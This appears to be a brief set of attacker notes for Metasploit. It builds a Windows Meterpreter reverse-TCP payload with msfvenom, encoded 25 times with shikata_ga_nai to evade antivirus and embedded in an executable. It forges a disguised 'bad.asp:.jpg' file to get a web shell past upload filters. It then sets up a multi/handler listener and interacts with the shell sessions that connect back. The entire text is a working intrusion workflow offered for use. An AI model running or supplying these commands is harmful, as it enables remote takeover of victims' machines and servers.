msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128
LPORT=4444 -e x86/shikata_ga_nai -i 25 -x /root/Desktop/atack.exe -f exe >
/root/Desktop/atack.exe
cat bad.jpg bad.asp > 'bad.asp:.jpg'
Msfconsole
use exploit/multi/handler
set Payload windows/meterpreter/reverse_tcp
set LHOST and LPORT
sessions -l
sessions -i 1